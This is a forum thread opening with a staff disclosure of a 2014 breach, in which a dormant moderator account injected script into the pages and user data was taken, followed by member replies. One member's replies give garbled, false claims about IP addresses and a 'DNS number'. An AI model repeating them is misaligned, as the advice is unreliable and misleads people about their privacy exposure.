Security and Privacy Issue : May-2014

[NightWish]

Security and Privacy Announcement
Between the 2nd of May 4pm UTC and 6th of May 6pm UTC the forum was the target of an attack that has compromised user privacy. We are sorry this has happened, that we were unable to stop it sooner, and that it has taken this long to get enough of the facts together to make an announcement.

Currently the information we know to have been disclosed, for all users, includes:

• Username
• Email address
• MD5 hash of salted-password
• Salt for password
• IP address used to register

This in itself is a significant breach but additionally it appears highly likely that the stored private messages, of any user who accessed the forum between the 2nd and the 6th, have also been disclosed.

What next?
As a result of this we have reset all passwords on this forum. If you can't log in, this is probably why. Use the password reset form. You should change your password to something new as a matter of urgency. If you use the same password on any other site, you should change it to something else on each of those sites too. Please note the passwords were stored in an encrypted form; however, with the number of people who use common passwords and share password across all the sites they visit, as revealed by other data breaches in the news recently, it is safe to assume that a number of them will be compromised even in the encrypted form.

We also suggest you review the private messages you have on the forum to assess the impact of their disclosure to you personally. We are looking for a way to provide more accurate information about who was effected by this but as yet do not have a definitive list.

We don't believe there are any further back-doors but may have to close the forum and restore from a backup to be absolutely sure. This is something we need to wait for GHDpro to handle. If we do, we will endeavour to sanitize and keep any posts more recent than the backup used. Any other steps we take will depend on further investigation.

Attack Details
We do not yet know how the initial account break happened, except to say that a some-what dormant staff account was used to create an announcement that injected a malicious script in each forum-viewing page, which in turn compromised the forum for each user (and resulted in private messages being downloaded). It is possible your own browser will have a record of this happening, as it was noticed as a back-button problem by some. If you block java-scripts by default you may have been protected.

Unfortunately the full impact of this was not fully understood at first; while the threat was being removed, it may have inadvertently given the attacker access to update another part of the forum, which they then used to download information from the user database. We have since disabled the staff account used in the initial attack, made our access restrictions stricter, and will review how we deal with old and dormant accounts, particularly those with privilege access.

Again, you have our deepest apologies for not better protecting your information and not making you aware of this problem much sooner.

Update May 13 - Forum Server Rebuild Complete (by GHDpro)
Due to this security issue we felt it necessary to completely wipe & rebuild the forum server and restore from backups. The backup that was restored is about two weeks old. However three tables were kept from before the rebuild: users, posts and threads. This means all user accounts (including password changes you may have already done) and posts and threads should have been preserved.

However, anything else posted, changed or uploaded in that time may have been lost, including visitor messages, PMs and any changes to pictures and albums, just to name a few. If you changed your avatar in the past two weeks you might also have to upload it again.

Due to the server rebuild (which took much longer than expected, sorry about that) and the way we restored the forum some things may be broken or not working correctly. Please notify us about this by posting in this thread, thank you.

[OH&S]

This is pretty serious. I assume the announcement in question is that random one that appeared in all forums that simply said 'test' and 'do not delete'. In hindsight that was obviously suspicious from the beginning.

[cyth]

Online forums such as these are perfect targets because they have weak security, little motivation to keep security up to and above current standards (which are shit), and enormous user information databases that opens doors elsewhere. It CANNOT be stressed enough that if you use the same OR similar passwords on other sites/services, and have something of worth to lose, you or your organization are most likely fucked.

[RPG_Fanatic]

As OH&S mentioned, that test announcement was pretty suspicious. It sucks that something like this happens, but I don't keep compromising information on the discussion forums I visit. I also make sure my passwords to other sites/services like e-mail are completely unique.

I hope no one suffers because of this.

[Marcus H.]

I don't want to start the blame game, but that particular announcement from that mod has been up for several days. If that was the start of a hacker chomping his way into AnimeSuki's security, then we have all been screwed way before the actual attack had been detected.

Personally, I assumed that it was a new mod that was "testing" his new powers. But then I quickly asked myself that such an event should have been announced earlier.

[cyth]

At least mods/admins should have passwords longer than 20 characters, or even longer passphrases, as a matter of policy.

[DragoMuseveni]

You can have a 54 character password if you have a keylloger in your pc , or something like that you ar done for. MD5 is pretty vulnerable . That announce was very suspicious , and when i accesed it , it was only a post ( I have Zone Alarm extreme security fully paid but it didn`t show me any alert) whit something like : Please do not delete it , it is only for a test , or something like that .

[Dengar]

Well we should be fine as long as the password we use here is different from the one for say, email, right?

[Thany]

I also did notice the announcement. But I didn't think much about it since I knew the guy who made it was a long-time moderator/admin. Thanksfully my animesuki password was already some random password I had gotten from a reset since I forgot it a few years ago. Didn't bother changing it, I guess that was a good idea.

[milan kyuubi]

Well this sucks big time!

Was this attack similar to the one in 2005?

I also noticed that the whole staff team is gone from "View Forum Leaders"?

Is there anything we as members can do to protect our self's? Beside simple changing our passwords?

Quote:

Originally Posted by DragoMuseveni

That announce was very suspicious , and when i accesed it , it was only a post ( I have Zone Alarm extreme security fully paid but it didn`t show me any alert) whit something like : Please do not delete it , it is only for a test , or something like that .

I actually used that announcement as reference in my post!

[Hiss13]

Is there anything the hacker can probably do with the IP Addresses of the users? That's the one thing I'm worried about here...

[Gary29]

When I checked said announcement, I figured it was a staff member testing for a possible vulnerability, but I didn't suspect it was an actual attack. Either way, I don't have anything compromising on my account, and I'll be sure to change my password again.

Anything 18 characters and up is pretty secure, but 20 characters minimum is usually safest. Hopefully no one will suffer due to this.

[Frailty]

Does this mean that our passwords and other related stuff that uses the same e-mail we use here, might be compromised?

will changing our current e-mail used help?

[DragoMuseveni]

Quote:

Originally Posted by Hiss13

Is there anything the hacker can probably do with the IP Addresses of the users? That's the one thing I'm worried about here...

Well , it can but can`t . As long as he doesn`t have the DNS number its okay . And if you have routable IP it`s better .

[Sheba]

I didn't read moderators and administrators' announcements if those were not active in forums or had not posted before. And announcements that read "test" were just too suspicious when Asuki's announcements were usually never for such frivolous things.

[Hiss13]

Quote:

Originally Posted by DragoMuseveni

Well , it can but can`t . As long as he doesn`t have the DNS number its okay . And if you have routable IP it`s better .

Not sure what you mean here. Can you put it into layman's terms, please?
I don't know much about internet connections and stuff...

[DragoMuseveni]

1) Short for Domain Name System (or Service or Server), an Internet service that translates domain names into IP addresses. Because domain names are alphabetic, they're easier to remember. The Internet however, is really based on IP addresses. Every time you use a domain name, therefore, a DNS service must translate the name into the corresponding IP address. For example, the domain name example.ooo might translate to 198.105.232.4.

The DNS system is, in fact, its own network. If one DNS server doesn't know how to translate a particular domain name, it asks another one, and so on, until the correct IP address is returned.

(2) Short for digital nervous system,a term coined by Bill Gates to describe a network of personal computers that make it easier to obtain and understand information.

And DNS can`t be changed unless you buy another pc or go to another internet provider . But DNS is hard to get unless you have acces to the pc in question

[SeijiSensei]

Quote:

Originally Posted by NightWish

We have since disabled the staff account used in the initial attack, made our access restrictions stricter, and will review how we deal with old and dormant accounts, particularly those with privilege access.

Accounts with anything other than ordinary user access should be closed once a person has retired from administrative duties; at most allow a one or two month grace period. The fact that an admin account was used for this exploit is its most troubling aspect, as I'm sure you all know.

[Hiss13]

Quote:

Originally Posted by DragoMuseveni

1) Short for Domain Name System (or Service or Server), an Internet service that translates domain names into IP addresses. Because domain names are alphabetic, they're easier to remember. The Internet however, is really based on IP addresses. Every time you use a domain name, therefore, a DNS service must translate the name into the corresponding IP address. For example, the domain name example.ooo might translate to 198.105.232.4.

The DNS system is, in fact, its own network. If one DNS server doesn't know how to translate a particular domain name, it asks another one, and so on, until the correct IP address is returned.

(2) Short for digital nervous system,a term coined by Bill Gates to describe a network of personal computers that make it easier to obtain and understand information.

And DNS can`t be changed unless you buy another pc or go to another internet provider . But DNS is hard to get unless you have acces to the pc in question

Basically, so long as the hacker doesn't have access to your computer, itself, we should be fine in that regard.

[MeoTwister5]

Curiously, is this mod a account a new mod or an old mod?